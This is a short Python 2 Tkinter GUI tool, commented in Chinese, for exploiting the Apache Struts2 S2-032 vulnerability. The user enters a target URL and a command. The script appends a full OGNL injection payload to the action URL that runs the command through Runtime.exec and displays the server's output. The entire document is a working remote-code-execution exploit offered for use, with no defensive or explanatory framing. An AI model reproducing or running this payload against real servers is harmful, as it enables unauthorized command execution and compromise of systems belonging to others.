struts-032利用工具 PythonGUI

# -*- coding: utf-8 -*-

import requests
from Tkinter import *


class App:
    def __init__(self, master):
        frame = Frame(master)
        # 主窗口里面再创建一个frame
        self.fm_1 = Frame(frame)
        self.fm_1.pack()

        # 设置一个label
        #l1 = Label(self.fm_1, text="url：").grid(row=0)

        # 设置一个url输入框
        s1 = StringVar()
        self.e1 = Entry(self.fm_1, borderwidth=3, textvariable=s1)
        self.e1.grid(row=0, column=0,columnspan=1,sticky=N + S)
        s1.set("Input url here ")

        # 添加一个命令输入框
        s2 = StringVar()
        self.e2 = Entry(self.fm_1, borderwidth=3, textvariable=s2)
        self.e2.grid(row=0, column=1,columnspan=1,sticky=N + S)
        s2.set("Input cmd here ")


        # 添加一个文本框，作为函数运行的输出
        # 添加一个self可以在其他定义的函数进行调用
        self.text = Text(self.fm_1)
        self.text.grid(row=3, column=0, columnspan=4, sticky=N + S)

        # 添加一个按钮
        b1 = Button(self.fm_1,
                    text="命令执行",
                    command=self.cmd).grid(row=0,
                                           column=2)
        # 添加一个清空按钮
        b2 = Button(self.fm_1,
                    text="清空",
                    command=self.clearText).grid(row=0,
                                           column=3)
        '''
        # 添加一个输出框，将函数运行结果输出到界面
        v1 = StringVar()
        e2 = Entry(fm_1 ,textvariable = v1,borderwidth = 3, )

        v1.set("normal")
        e2.grid(row=2, column =0,columnspan = 3,rowspan = 5)
        '''

        frame.pack()
    def clearText(self):
        self.text.delete(0.0,END)
    def cmd(self):
        url = self.e1.get()
        cmd = self.e2.get()
        # 对url进行处理，拼接payload
        url_patterns = url.split("action")
        url=url_patterns[0]+"action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd="+cmd+"&pp=\\\\A&ppp=%20&encoding=UTF-8"
        response = requests.get(url)
        result = response.text
        self.text.insert(INSERT, "[*] Apache Structs2 S2-032\n")
        self.text.insert(INSERT, "[*] cmd: "+cmd+"\n")
        self.text.insert(INSERT, '\n'+result+'\n')

if __name__ == '__main__':
    root = Tk()

    # 设置窗体名称
    root.title("struts2-032利用工具")

    # 设置窗体大小
    # root.geometry('300x300')

    app = App(root)
    root.mainloop()
    root.destroy()